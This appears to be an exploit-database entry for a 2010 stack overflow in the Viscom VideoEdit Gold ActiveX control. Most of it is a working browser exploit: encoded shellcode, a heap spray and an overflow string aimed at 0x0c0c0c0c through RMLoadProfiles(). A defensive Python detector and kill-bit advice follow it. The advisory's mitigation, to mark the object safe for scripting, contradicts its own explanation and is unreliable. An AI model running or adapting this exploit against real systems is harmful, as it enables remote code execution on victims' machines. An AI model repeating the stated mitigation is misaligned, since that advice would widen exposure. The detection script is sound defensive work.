Vendor: VideoEdit Gold ActiveX Control
By: Rew
CVSS: LOW
CWE: 119 (Stack Overflow)
Product Name: VideoEdit Gold ActiveX Control
Affected Version From: 8.0.0.0
Affected Version To: 8.0.0.0
Patch Exists: NO
Related CWE: NA (0day)
CPE: a:viscom_software:videoedit_gold_activex_control
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WinXP - IE 6
Date: 2010

Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit

This is a plain vanilla stack overflow exploit for Viscom VideoEdit Gold ActiveX 8.0. The exploit is a copy-and-paste job (in the author's words, "Ctrl+C Ctrl+V, herpderp") that heap-sprays a shellcode which launches calc.exe. The impact is relatively low because the object is not marked safe for scripting, so the user has to change the default IE settings before it will run.

Mitigation:

Mark the object as safe for scripting

Exploit-DB raw data:

<!--
 
Title: Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit
Date: Dec 5, 2010
Author: Rew
Email: rew [splat] leethax.info
Link: http://www.viscomsoft.com/products/videoeditgold/index.html
Version: 8.0.0.0
Tested on: WinXP - IE 6
CVE: NA (0day)
 
Impact is relatively low due to object not marked safe for scripting. You'll
need to change the default IE settings to let it run.

This is a plain vanilla stack overflow. The file is...
"%PROGRAMFILES%\VideoEdit Gold ActiveX Control\VideoEdit.ocx"
I'm not using the SEH, but here are the offsets just for kicks if you're interested.

[2311 junk] [ebp] [eip] [284 junk] [nseh] [seh]
 
-->

<object classid='clsid:57D9AF4C-23BA-47EC-A40B-2DA79641B285' id='target'></object>

<script>

// Ctrl+C Ctrl+V, herpderp

// calc.exe
var shellcode = unescape(
	'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
	'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
	'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
	'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
	'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
	'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
	'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
	'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'
); 

var nops = unescape('%u9090%u9090'); // NOP sled seed, doubled below

// Heap spray: headersize is the allowance for the JS string object header,
// so block + shellcode fills each allocation exactly.
var headersize = 20;
var slackspace = headersize + shellcode.length;

while(nops.length < slackspace) {
	nops += nops;
}

var fillblock = nops.substring(0, slackspace);
var block = nops.substring(0, nops.length - slackspace);

// Grow each block to roughly 0x50000 bytes of NOPs.
while((block.length + slackspace) < 0x50000) {
	block = block + block + fillblock;
}

// 200 copies of block + shellcode fill the heap so that 0x0c0c0c0c lands in a sled.
var memory = new Array();
for(var counter = 0; counter < 200; counter++){
	memory[counter] = block + shellcode;
}

// Overflow string: 2312 bytes of filler, then saved EBP, then the return address.
var bof = '';
while(bof.length < 2312){
	bof += 'A';
}
bof += 'BBBB'; // EBP
bof += "\x0c\x0c\x0c\x0c"; // EIP, points into the spray

// The oversized argument overruns the stack buffer inside RMLoadProfiles().
document.getElementById('target').RMLoadProfiles( bof );

</script>
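As an added example (not part of the advisory and not the vendor's code), the following Python script statically triages saved HTML for the indicators visible in the exploit above: the control's CLSID from the `<object>` tag, a long `%u`-escaped blob fed to `unescape()`, an Array-fill heap-spray loop, and the 0x0c0c0c0c return-address marker. The sample pages embedded in it are constructed; the `%u` blob is NOP filler, not the advisory's shellcode, and the regex thresholds and function names are my own choices.

```python
"""Static triage of saved HTML for the VideoEdit Gold ActiveX exploit pattern.

Hypothetical defender-side helper (added example, not the advisory's own code).
"""
import re

# CLSID instantiated by the advisory's <object> tag.
VISCOM_VIDEOEDIT_CLSID = "57D9AF4C-23BA-47EC-A40B-2DA79641B285"

# classid='clsid:...' with or without braces; case-insensitive.
CLSID_RE = re.compile(
    r"clsid:\{?([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}?", re.I)

# unescape( '...' + '...' ): captures the concatenated quoted pieces.
UNESCAPE_RE = re.compile(
    r"unescape\s*\(\s*((?:['\"][^'\"]*['\"]\s*\+?\s*)+)\)", re.I | re.S)

# new Array() shortly followed by a for loop storing `x + y` into an index:
# the classic heap-spray fill (block + shellcode per slot).
ARRAY_SPRAY_RE = re.compile(
    r"new\s+Array\s*\(\s*\)[\s\S]{0,200}?for\s*\([^)]*\)\s*\{[^}]*\]\s*=\s*\w+\s*\+\s*\w+",
    re.I)

# 0x0c0c0c0c as a JS string escape, a numeric literal, or a %u pair.
RET_MARKER_RE = re.compile(r"(\\x0c){4}|0x0c0c0c0c|%u0c0c%u0c0c", re.I)

U_TOKEN_RE = re.compile(r"%u[0-9a-f]{4}", re.I)


def count_u_escapes(expr: str) -> int:
    """Number of %uXXXX tokens inside an unescape() argument."""
    return len(U_TOKEN_RE.findall(expr))


def triage(html: str, shellcode_min_tokens: int = 32) -> dict:
    """Return indicator -> detail for the page source; empty dict if nothing hit."""
    findings = {}
    clsids = {m.group(1).upper() for m in CLSID_RE.finditer(html)}
    if VISCOM_VIDEOEDIT_CLSID in clsids:
        findings["vulnerable_clsid"] = VISCOM_VIDEOEDIT_CLSID
    longest = max((count_u_escapes(m.group(1)) for m in UNESCAPE_RE.finditer(html)),
                  default=0)
    if longest >= shellcode_min_tokens:
        findings["unescaped_blob_tokens"] = longest
    if ARRAY_SPRAY_RE.search(html):
        findings["heap_spray_loop"] = True
    if RET_MARKER_RE.search(html):
        findings["ret_marker_0c0c0c0c"] = True
    return findings


def verdict(findings: dict) -> str:
    """Collapse findings to a triage label: three or more indicators look like
    the full exploit, one or two merit a look, none is clean."""
    if len(findings) >= 3:
        return "exploit"
    if findings:
        return "suspicious"
    return "clean"


# Constructed sample in the advisory's layout; the %u blob is 40 copies of the
# %u9090 NOP token, not the advisory's shellcode.
SAMPLE_EXPLOIT_PAGE = r"""
<object classid='clsid:57D9AF4C-23BA-47EC-A40B-2DA79641B285' id='target'></object>
<script>
var shellcode = unescape(__BLOB__);
var nops = unescape('%u9090%u9090');
memory=new Array();
for(counter=0; counter<200; counter++){
    memory[counter] = block + shellcode;
}
var bof = '';
bof += 'BBBB';
bof += "\x0c\x0c\x0c\x0c";
document.getElementById('target').RMLoadProfiles( bof );
</script>
""".replace("__BLOB__", "'" + "%u9090" * 40 + "'")

# Constructed page that merely embeds the same control without any spray.
SAMPLE_LEGIT_PAGE = r"""
<object classid='clsid:57D9AF4C-23BA-47EC-A40B-2DA79641B285' id='editor'></object>
<script>var editor = document.getElementById('editor');</script>
"""


if __name__ == "__main__":
    for name, page in (("exploit", SAMPLE_EXPLOIT_PAGE), ("legit", SAMPLE_LEGIT_PAGE)):
        found = triage(page)
        print(name, verdict(found), found)
```

A page that only embeds the control (a legitimate install page for the product) reports the CLSID alone and is labelled "suspicious", so treat the verdict as a triage aid rather than a block decision. On the client side the durable fix is IE's kill bit for the CLSID, a `Compatibility Flags` DWORD of 0x400 under `HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}`, which stops the control from being instantiated regardless of the safe-for-scripting setting.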